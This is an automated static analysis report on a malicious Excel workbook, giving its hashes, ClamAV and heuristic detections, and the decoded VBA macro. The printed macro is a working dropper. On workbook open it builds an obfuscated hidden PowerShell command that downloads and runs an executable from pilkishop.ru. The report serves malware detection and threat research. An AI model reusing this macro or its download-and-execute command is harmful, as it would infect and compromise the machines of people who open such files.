Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 9c144853c3dd5089…

MALICIOUS

Office (OOXML) / .XLSX

45.3 KB Created: 2021-10-08 10:35:53 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-13
MD5: 4e67956348b3804e6a5d7ec212f55a16 SHA-1: 3714b2061f308566a9ab783e79b8c35ba16a8fff SHA-256: 9c144853c3dd50896d90666eb714cdd5b1b21e6f4ee93b9975d72f93b90d4789
310 Risk Score

Heuristics 7

  • ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://pilkishop.ru/images.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1309 bytes
SHA-256: 75289596d597084c96c1d589aadafb415b50f615fa0e102adf8bd1a173a9e11a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Lgbrafhdrsi As String, sOutput As String
Dim Pyvlftczrhh As Object, PyvlftczrhhExec As Object
Lgbrafhdrsi = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } –Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://pilkishop.ru/images.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
Lgbrafhdrsi = Replace(Lgbrafhdrsi, "*", "")
Lgbrafhdrsi = Replace(Lgbrafhdrsi, "^", "")
Set Pyvlftczrhh = CreateObject("WScript.Shell")
Set PyvlftczrhhExec = Pyvlftczrhh.Exec(Lgbrafhdrsi)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 5120 bytes
SHA-256: c69b9a229b9c55eb00072c34d5138ab9cbc9a7d171e1e3fe582213fcaa3a910f
Detection
ClamAV: Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.